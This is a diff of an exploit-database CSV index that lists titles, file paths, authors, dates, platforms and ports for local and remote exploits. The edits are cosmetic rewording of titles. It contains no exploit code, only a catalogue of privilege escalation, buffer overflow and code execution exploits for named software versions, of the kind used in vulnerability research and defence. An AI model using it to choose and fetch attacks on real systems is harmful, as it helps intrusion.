-32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Privilege Escalation",2009-02-02,"Ruben Santamarta",windows,local,0 +32771,platforms/windows/local/32771.txt,"Kaspersky (Multiple Products) - 'klim5.sys' Privilege Escalation",2009-02-02,"Ruben Santamarta",windows,local,0 32778,platforms/windows/local/32778.pl,"Password Door 8.4 - Local Buffer Overflow",2009-02-05,b3hz4d,windows,local,0 32793,platforms/windows/local/32793.rb,"Microsoft Word - RTF Object Confusion (MS14-017) (Metasploit)",2014-04-10,Metasploit,windows,local,0 32805,platforms/linux/local/32805.c,"Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure",2009-02-20,"Clément Lecigne",linux,local,0 @@ -8573,7 +8574,7 @@ id,file,description,date,author,platform,type,port 32845,platforms/windows/local/32845.pl,"IBM System Director Agent 5.20 - CIM Server Privilege Escalation",2009-03-10,"Bernhard Mueller",windows,local,0 32847,platforms/multiple/local/32847.txt,"PostgreSQL 8.3.6 - Low Cost Function Information Disclosure",2009-03-10,"Andres Freund",multiple,local,0 32848,platforms/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 - Privilege Escalation",2009-03-10,"Sun Microsystems",linux,local,0 -32850,platforms/windows/local/32850.txt,"Multiple SlySoft Products - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0 +32850,platforms/windows/local/32850.txt,"SlySoft (Multiple Products) - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0 32884,platforms/android/local/32884.txt,"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution",2014-04-15,"Yorick Koster",android,local,0 32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 @@ -8605,7 +8606,7 @@ id,file,description,date,author,platform,type,port 33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local,0 33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local,0 33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Privilege Escalation",2014-06-02,"Sebastian Krahmer",linux,local,0 -33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0 +33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalations",2010-02-10,"Tim Brown",linux,local,0 33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0 40342,platforms/win_x86-64/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",win_x86-64,local,0 33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - 'addJavascriptInterface' Exploit (Metasploit)",2014-06-17,Metasploit,arm,local,0 @@ -8691,11 +8692,11 @@ id,file,description,date,author,platform,type,port 35813,platforms/windows/local/35813.py,"Congstar Internet Manager - Buffer Overflow (SEH)",2015-01-18,metacom,windows,local,0 35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0 35993,platforms/windows/local/35993.c,"AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 -35994,platforms/windows/local/35994.c,"BullGuard Multiple Products - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 +35994,platforms/windows/local/35994.c,"BullGuard (Multiple Products) - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 35847,platforms/osx/local/35847.c,"Apple Mac OSX networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0 35848,platforms/osx/local/35848.c,"Apple Mac OSX 10.9.5 - IOKit IntelAccelerator Null Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0 35850,platforms/windows/local/35850.bat,"Microsoft Windows XP - 'tskill' Privilege Escalation",2011-06-13,"Todor Donev",windows,local,0 -35992,platforms/windows/local/35992.c,"K7 Computing Multiple Products - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 +35992,platforms/windows/local/35992.c,"K7 Computing (Multiple Products) - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 35901,platforms/windows/local/35901.txt,"VideoLAN VLC Media Player 2.1.5 - DEP Access Violation",2015-01-26,"Veysel HATAS",windows,local,0 35902,platforms/windows/local/35902.txt,"VideoLAN VLC Media Player 2.1.5 - Write Access Violation",2015-01-26,"Veysel HATAS",windows,local,0 35905,platforms/windows/local/35905.c,"Comodo Backup 4.4.0.0 - Null Pointer Dereference Privilege Escalation",2015-01-26,"Parvez Anwar",windows,local,0 @@ -8703,7 +8704,7 @@ id,file,description,date,author,platform,type,port 35934,platforms/osx/local/35934.txt,"Apple Mac OSX < 10.10.x - GateKeeper Bypass",2015-01-29,"Amplia Security Research",osx,local,0 35936,platforms/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Privilege Escalation (MS14-070)",2015-01-29,KoreLogic,windows,local,0 35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0 -35962,platforms/windows/local/35962.c,"Trend Micro Multiple Products 8.0.1133 - Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local,0 +35962,platforms/windows/local/35962.c,"Trend Micro 8.0.1133 (Multiple Products) - Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local,0 35964,platforms/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Privilege Escalation",2015-02-01,"Parvez Anwar",windows,local,0 36052,platforms/windows/local/36052.c,"SoftSphere DefenseWall FW/IPS 3.24 - Privilege Escalation",2015-02-11,"Parvez Anwar",windows,local,0 36053,platforms/windows/local/36053.py,"MooPlayer 1.3.0 - 'm3u' Buffer Overflow (SEH) (1)",2015-02-11,"dogo h@ck",windows,local,0 @@ -8896,7 +8897,7 @@ id,file,description,date,author,platform,type,port 39147,platforms/osx/local/39147.c,"Apple Mac OSX - Local Security Bypass",2014-04-22,"Ian Beer",osx,local,0 39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0 39166,platforms/linux/local/39166.c,"Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Privilege Escalation (1)",2016-01-05,rebel,linux,local,0 -39207,platforms/linux/local/39207.txt,"dpkg Source Package - Index: pseudo-header Processing Multiple Local Directory Traversal",2014-05-25,"Raphael Geissert",linux,local,0 +39207,platforms/linux/local/39207.txt,"dpkg Source Package - Index: pseudo-header Processing Multiple Local Directory Traversals",2014-05-25,"Raphael Geissert",linux,local,0 39214,platforms/linux/local/39214.c,"Linux Kernel 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure",2014-05-28,"Salva Peiro",linux,local,0 39217,platforms/linux/local/39217.c,"Amanda 3.3.1 - Privilege Escalation",2016-01-11,"Hacker Fantastic",linux,local,0 39230,platforms/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Privilege Escalation (2)",2016-01-12,halfdog,linux,local,0 @@ -8982,7 +8983,7 @@ id,file,description,date,author,platform,type,port 39992,platforms/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",linux,local,0 40017,platforms/windows/local/40017.py,"Mediacoder 0.8.43.5830 - '.m3u' Buffer Overflow (SEH)",2016-06-27,"Sibusiso Sishi",windows,local,0 40018,platforms/windows/local/40018.py,"VUPlayer 2.49 (Windows 7) - '.m3u' Buffer Overflow (DEP Bypass)",2016-06-27,secfigo,windows,local,0 -40020,platforms/windows/local/40020.txt,"Panda Security Multiple Products - Privilege Escalation",2016-06-27,Security-Assessment.com,windows,local,0 +40020,platforms/windows/local/40020.txt,"Panda Security (Multiple Products) - Privilege Escalation",2016-06-27,Security-Assessment.com,windows,local,0 40023,platforms/linux/local/40023.py,"PInfo 0.6.9-5.1 - Local Buffer Overflow",2016-06-27,"Juan Sacco",linux,local,0 40025,platforms/linux/local/40025.py,"HNB 1.9.18-10 - Local Buffer Overflow",2016-06-27,"Juan Sacco",linux,local,0 40039,platforms/win_x86/local/40039.cpp,"Microsoft Windows 7 SP1 (x86) - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win_x86,local,0 @@ -9511,7 +9512,7 @@ id,file,description,date,author,platform,type,port 592,platforms/windows/remote/592.py,"Ability Server 2.34 - (APPE) Remote Buffer Overflow",2004-10-23,KaGra,windows,remote,21 598,platforms/windows/remote/598.py,"TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Buffer Overflow",2004-10-26,muts,windows,remote,25 608,platforms/linux/remote/608.c,"WvTFTPd 0.9 - Heap Overflow",2004-10-28,infamous41md,linux,remote,69 -609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution (PoC)",2004-10-28,infamous41md,linux,remote,0 +609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Executions (PoC)",2004-10-28,infamous41md,linux,remote,0 612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow",2004-11-02,Skylined,windows,remote,0 616,platforms/windows/remote/616.c,"MiniShare 1.4.1 - Remote Buffer Overflow (1)",2004-11-07,class101,windows,remote,80 618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21 @@ -10275,8 +10276,8 @@ id,file,description,date,author,platform,type,port 6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",windows,remote,0 6012,platforms/windows/remote/6012.php,"Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80 6013,platforms/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,osx,remote,0 -6026,platforms/linux/remote/6026.pl,"Fonality trixbox - 'langChoice' Parameter Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 -6045,platforms/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Parameter Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80 +6026,platforms/linux/remote/6026.pl,"Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 +6045,platforms/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Escalation",2008-07-17,eliteboy,linux,remote,0 6100,platforms/win_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,win_x86,remote,80 @@ -10343,7 +10344,7 @@ id,file,description,date,author,platform,type,port 6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22 6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)",2008-10-23,"Aviv Raff",windows,remote,0 6828,platforms/windows/remote/6828.html,"db Software Laboratory VImpX - 'VImpX.ocx' Multiple Vulnerabilities",2008-10-24,shinnai,windows,remote,0 -6840,platforms/windows/remote/6840.html,"PowerTCP FTP module - Multiple Technique Exploit (SEH HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0 +6840,platforms/windows/remote/6840.html,"PowerTCP FTP Module - Multiple Exploit Techniques (SEH HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0 6841,platforms/windows/remote/6841.txt,"Microsoft Windows Server - Code Execution (MS08-067) (Universal)",2008-10-26,EMM,windows,remote,135 6870,platforms/windows/remote/6870.html,"MW6 Aztec - ActiveX 'Aztec.dll' Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6871,platforms/windows/remote/6871.html,"MW6 Barcode - ActiveX 'Barcode.dll' Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 @@ -10657,7 +10658,7 @@ id,file,description,date,author,platform,type,port 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0 9998,platforms/windows/remote/9998.c,"BulletProof FTP Client 2.63 b56 - '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21 10000,platforms/hardware/remote/10000.txt,"Cisco ACE XML Gateway 6.0 - Internal IP Disclosure",2009-09-25,nitr0us,hardware,remote,0 -10001,platforms/multiple/remote/10001.txt,"CUPS - 'kerberos' Parameter Cross-Site Scripting",2009-11-11,"Aaron Sigel",multiple,remote,80 +10001,platforms/multiple/remote/10001.txt,"CUPS - 'kerberos' Cross-Site Scripting",2009-11-11,"Aaron Sigel",multiple,remote,80 10007,platforms/windows/remote/10007.html,"EasyMail Objects 'EMSMTP.DLL 6.0.1' - ActiveX Control Remote Buffer Overflow",2009-11-12,"Will Dormann",windows,remote,0 10011,platforms/hardware/remote/10011.txt,"HP LaserJet Printers - Multiple Persistent Cross-Site Scripting Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80 10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007/2007 SP2 - 'open_marker_file' Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 @@ -10690,7 +10691,7 @@ id,file,description,date,author,platform,type,port 10081,platforms/hardware/remote/10081.txt,"Palm Pre WebOS 1.1 - Remote File Access",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 10083,platforms/php/remote/10083.txt,"PHP 5.3 - 'preg_match()' Full Path Disclosure",2009-09-27,"David Vieira-Kurz",php,remote,0 10086,platforms/multiple/remote/10086.txt,"WebKit - 'Document()' Remote Information Disclosure",2009-11-12,"Chris Evans",multiple,remote,0 -10093,platforms/multiple/remote/10093.txt,"Adobe Shockwave Player 11.5.1.601 - Multiple Code Execution",2009-11-04,"Francis Provencher",multiple,remote,0 +10093,platforms/multiple/remote/10093.txt,"Adobe Shockwave Player 11.5.1.601 - Multiple Code Executions",2009-11-04,"Francis Provencher",multiple,remote,0 10095,platforms/multiple/remote/10095.txt,"Samba 3.0.10 < 3.3.5 - Format String / Security Bypass",2009-11-13,"Jeremy Allison",multiple,remote,0 10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0 10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 - iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0 @@ -10700,7 +10701,7 @@ id,file,description,date,author,platform,type,port 10258,platforms/windows/remote/10258.pl,"Golden FTP Server 4.30 - File Deletion",2009-12-01,sharpe,windows,remote,21 10269,platforms/windows/remote/10269.html,"Haihaisoft Universal Player 1.4.8.0 - 'URL' Property ActiveX Buffer Overflow",2009-12-01,shinnai,windows,remote,0 10282,platforms/linux/remote/10282.py,"OrzHTTPd - Format String",2009-12-03,"Patroklos Argyroudis",linux,remote,80 -10340,platforms/windows/remote/10340.pl,"Multiple Symantec Products - Intel Common Base Agent Remote Command Execution",2009-04-28,kingcope,windows,remote,0 +10340,platforms/windows/remote/10340.pl,"Symantec (Multiple Products) - Intel Common Base Agent Remote Command Execution",2009-04-28,kingcope,windows,remote,0 10362,platforms/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Download",2009-12-09,"AnTi SeCuRe",hardware,remote,0 10365,platforms/windows/remote/10365.rb,"Eureka Email 2.2q - ERR Remote Buffer Overflow (Metasploit) (1)",2009-12-09,dookie,windows,remote,0 10375,platforms/windows/remote/10375.html,"SAP GUI for Windows - 'sapirrfc.dll' ActiveX Overflow",2009-12-10,Abysssec,windows,remote,0 @@ -10715,10 +10716,10 @@ id,file,description,date,author,platform,type,port 14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow",2010-07-07,chap0,windows,remote,0 10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager - 'OmniInet.exe' Buffer Overflow",2009-12-26,EgiX,windows,remote,5555 10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - Exploit (SEH)",2009-12-29,Lincoln,windows,remote,6660 -10791,platforms/windows/remote/10791.py,"Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80 +10791,platforms/windows/remote/10791.py,"Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x Vulnerabilities",2009-12-30,emgent,windows,remote,80 10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Exploit",2010-01-02,Lincoln,windows,remote,0 10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow (2)",2010-01-03,DouBle_Zer0,windows,remote,0 -10980,platforms/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behaviour",2010-01-04,emgent,linux,remote,0 +10980,platforms/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behaviour Vulnerabilities",2010-01-04,emgent,linux,remote,0 11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0 11027,platforms/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow (Perl)",2010-01-06,jacky,windows,remote,0 11059,platforms/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow",2010-01-07,"germaya_x and D3V!L FUCKER",windows,remote,0 @@ -10757,11 +10758,11 @@ id,file,description,date,author,platform,type,port 11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll OpenFile()' Remote Overflow",2010-03-15,mr_me,windows,remote,0 11765,platforms/windows/remote/11765.txt,"ArGoSoft FTP Server .NET 1.0.2.1 - Directory Traversal",2010-03-15,dmnt,windows,remote,21 11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution (via Cross Application Scripting)",2010-03-20,emgent,multiple,remote,0 -11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0 +11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflows (1)",2010-03-20,corelanc0d3r,windows,remote,0 11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0 11856,platforms/multiple/remote/11856.txt,"uhttp Server 0.1.0-alpha - Directory Traversal",2010-03-23,"Salvatore Fresta",multiple,remote,0 11857,platforms/windows/remote/11857.c,"MX Simulator Server - Remote Buffer Overflow (PoC)",2010-03-23,"Salvatore Fresta",windows,remote,0 -11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2)",2010-03-25,sud0,windows,remote,21 +11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflows (2)",2010-03-25,sud0,windows,remote,21 11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0 11886,platforms/windows/remote/11886.py,"SAP MaxDB - Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",windows,remote,0 11973,platforms/windows/remote/11973.txt,"CompleteFTP Server - Directory Traversal",2010-03-30,zombiefx,windows,remote,0 @@ -10858,7 +10859,7 @@ id,file,description,date,author,platform,type,port 14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server - Hash Disclosure",2010-07-18,kingcope,aix,remote,0 14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow (Metasploit)",2010-07-19,Madjix,windows,remote,0 14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption",2010-07-20,"Elazar Broad",windows,remote,0 -14447,platforms/windows/remote/14447.html,"Multiple Browser (FF3.6.7/SM 2.0.6) - Clickjacking",2010-07-23,"Pouya Daneshmand",windows,remote,0 +14447,platforms/windows/remote/14447.html,"Multiple Browsers (FF3.6.7/SM 2.0.6) - Clickjacking",2010-07-23,"Pouya Daneshmand",windows,remote,0 14451,platforms/windows/remote/14451.rb,"EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 14456,platforms/aix/remote/14456.c,"IBM AIX 5l FTPd - Remote DES Hash Exploit",2010-07-24,kingcope,aix,remote,0 14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 @@ -10880,7 +10881,7 @@ id,file,description,date,author,platform,type,port 14602,platforms/multiple/remote/14602.txt,"Play! Framework 1.0.3.1 - Directory Traversal",2010-08-10,kripthor,multiple,remote,0 14605,platforms/windows/remote/14605.html,"RSP MP3 Player - OCX ActiveX Buffer Overflow (heap spray)",2010-08-10,Madjix,windows,remote,0 14604,platforms/windows/remote/14604.py,"Easy FTP 1.7.0.11 - Buffer Overflow Vulnerabilities in NLST & NLST -al & APPE & RETR & SIZE & XCWD Commands",2010-08-10,"Rabih Mohsen",windows,remote,0 -14623,platforms/windows/remote/14623.py,"EasyFTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous",windows,remote,21 +14623,platforms/windows/remote/14623.py,"EasyFTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflows",2010-08-11,"Glafkos Charalambous",windows,remote,21 14658,platforms/windows/remote/14658.txt,"123 FlashChat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,windows,remote,0 14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal",2010-08-14,Unknown,multiple,remote,0 14674,platforms/windows/remote/14674.txt,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0 @@ -10913,7 +10914,7 @@ id,file,description,date,author,platform,type,port 15231,platforms/windows/remote/15231.py,"Sync Breeze Server 2.2.30 - Remote Buffer Overflow",2010-10-11,"xsploited security",windows,remote,0 15235,platforms/windows/remote/15235.html,"AoA Audio Extractor 2.x - ActiveX ROP Exploit",2010-10-11,mr_me,windows,remote,0 15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow",2010-10-12,"xsploited security",windows,remote,0 -15241,platforms/windows/remote/15241.txt,"Oracle Java 6 - OBJECT tag 'launchjnlp'/'docbase' Parameter Buffer Overflow",2010-10-13,Skylined,windows,remote,0 +15241,platforms/windows/remote/15241.txt,"Oracle Java 6 - OBJECT tag 'launchjnlp'/'docbase' Buffer Overflow",2010-10-13,Skylined,windows,remote,0 15244,platforms/unix/remote/15244.txt,"Oracle Virtual Server Agent - Command Injection",2010-10-13,"Nahuel Grisolia",unix,remote,0 15265,platforms/asp/remote/15265.rb,"Microsoft ASP.NET - Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote,0 15266,platforms/windows/remote/15266.txt,"Microsoft Windows - NTLM Weak Nonce (MS10-012)",2010-10-17,"Hernan Ochoa",windows,remote,0 @@ -11135,7 +11136,7 @@ id,file,description,date,author,platform,type,port 16413,platforms/windows/remote/16413.rb,"CA BrightStor ArcServe - Media Service Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 16414,platforms/windows/remote/16414.rb,"CA BrightStor ARCserve License Service - GCR NETWORK Buffer Overflow (Metasploit)",2010-11-03,Metasploit,windows,remote,0 16415,platforms/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow (Metasploit)",2011-03-10,Metasploit,windows,remote,0 -16416,platforms/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflow (Metasploit)",2010-11-04,Metasploit,windows,remote,0 +16416,platforms/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflows (Metasploit)",2010-11-04,Metasploit,windows,remote,0 16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 16418,platforms/windows/remote/16418.rb,"CA BrightStor ARCserve - Message Engine Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 16419,platforms/windows/remote/16419.rb,"Mercury/32 < 4.01b - PH Server Module Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 @@ -11565,8 +11566,8 @@ id,file,description,date,author,platform,type,port 17063,platforms/windows/remote/17063.txt,"Easy File Sharing Web Server 5.8 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",windows,remote,0 17068,platforms/multiple/remote/17068.py,"jHTTPd 0.1a - Directory Traversal",2011-03-29,"AutoSec Tools",multiple,remote,0 17078,platforms/multiple/remote/17078.java,"Zend Java Bridge - Remote Code Execution (ZDI-11-113)",2011-03-30,ikki,multiple,remote,0 -17104,platforms/windows/remote/17104.txt,"RealNetworks RealGames StubbyUtil.ShellCtl.1 - ActiveX Control Multiple Remote Command Execution",2011-04-03,rgod,windows,remote,0 -17105,platforms/windows/remote/17105.txt,"RealNetworks RealGames StubbyUtil.ProcessMgr.1 - ActiveX Control Multiple Remote Command Execution",2011-04-03,rgod,windows,remote,0 +17104,platforms/windows/remote/17104.txt,"RealNetworks RealGames StubbyUtil.ShellCtl.1 - ActiveX Control Multiple Remote Command Executions",2011-04-03,rgod,windows,remote,0 +17105,platforms/windows/remote/17105.txt,"RealNetworks RealGames StubbyUtil.ProcessMgr.1 - ActiveX Control Multiple Remote Command Executions",2011-04-03,rgod,windows,remote,0 17181,platforms/linux/remote/17181.pl,"FiSH-irssi 0.99 - Evil ircd Buffer Overflow",2011-04-17,"Caleb James DeLisle",linux,remote,0 17148,platforms/multiple/remote/17148.rb,"Zend Server Java Bridge - Arbitrary Java Code Execution (Metasploit)",2011-04-05,Metasploit,multiple,remote,10001 17149,platforms/windows/remote/17149.rb,"Real Networks Arcade Games - StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution (Metasploit)",2011-04-09,Metasploit,windows,remote,0 @@ -11821,7 +11822,7 @@ id,file,description,date,author,platform,type,port 18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow (Metasploit)",2012-06-01,Metasploit,windows,remote,0 18973,platforms/windows/remote/18973.rb,"GIMP script-fu - Server Buffer Overflow (Metasploit)",2012-06-02,Metasploit,windows,remote,0 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 -19027,platforms/windows/remote/19027.rb,"Samsung NET-i viewer - Multiple ActiveX 'BackupToAvi()' Remote Overflow (Metasploit)",2012-06-08,Metasploit,windows,remote,0 +19027,platforms/windows/remote/19027.rb,"Samsung NET-i viewer - Multiple ActiveX 'BackupToAvi()' Remote Overflows (Metasploit)",2012-06-08,Metasploit,windows,remote,0 19026,platforms/windows/remote/19026.rb,"Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (MS02-065) (Metasploit)",2012-06-08,Metasploit,windows,remote,0 19002,platforms/windows/remote/19002.rb,"Microsoft Windows - OLE Object File Handling Remote Code Execution (Metasploit)",2012-06-06,Metasploit,windows,remote,0 19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory - Remote Code Execution (Metasploit)",2012-06-10,Metasploit,windows,remote,0 @@ -11968,7 +11969,7 @@ id,file,description,date,author,platform,type,port 19558,platforms/linux/remote/19558.c,"OpenLink Software OpenLink 3.2 - Remote Buffer Overflow",1999-10-15,"Tymm Twillman",linux,remote,0 19559,platforms/windows/remote/19559.txt,"Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL Redirection (MS99-043)",1999-10-18,"Georgi Guninski",windows,remote,0 19560,platforms/multiple/remote/19560.c,"Washington University WU-FTPD 2.5.0 - message Buffer Overflow",1999-10-19,typo/teso,multiple,remote,0 